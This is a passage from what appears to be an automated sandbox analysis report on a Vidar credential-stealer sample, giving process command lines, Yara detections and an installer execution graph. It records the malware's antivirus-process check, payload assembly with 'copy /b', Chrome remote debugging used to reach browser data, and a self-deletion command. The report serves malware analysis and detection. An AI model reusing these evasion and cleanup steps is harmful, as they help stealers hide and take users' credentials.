                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                          Start time:16:46:59
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                          Imagebase:0x4d0000
                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                                          Start time:16:46:59
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:cmd /c md 523266
                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                          Start time:16:46:59
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:findstr /V "landing" Ca
                                                                                                                                                                                                                                                                          Imagebase:0x4d0000
                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                          Start time:16:47:00
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:cmd /c copy /b ..\Existing + ..\Lower + ..\Wants + ..\Elvis + ..\Distribution x
                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                          Start time:16:47:00
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:Relationship.com x
                                                                                                                                                                                                                                                                          Imagebase:0xbf0000
                                                                                                                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                                                                                                                          MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1986763504.00000000018A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1986800119.00000000043FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2593745021.0000000001864000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                          Start time:16:47:00
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                          Imagebase:0x380000
                                                                                                                                                                                                                                                                          File size:28'160 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                          Start time:16:47:45
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                          Start time:16:47:46
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2344,i,12562058897419694895,3034342051900266821,262144 /prefetch:8
                                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                          Start time:16:48:29
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\523266\Relationship.com" & rd /s /q "C:\ProgramData\8Y5XTR16XLN7" & exit
                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                                          Start time:16:48:29
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                                          Start time:16:48:29
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:timeout /t 10
                                                                                                                                                                                                                                                                          Imagebase:0xdd0000
                                                                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:17.7%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                            Signature Coverage:21%
                                                                                                                                                                                                                                                                            Total number of Nodes:1482
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                            execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d 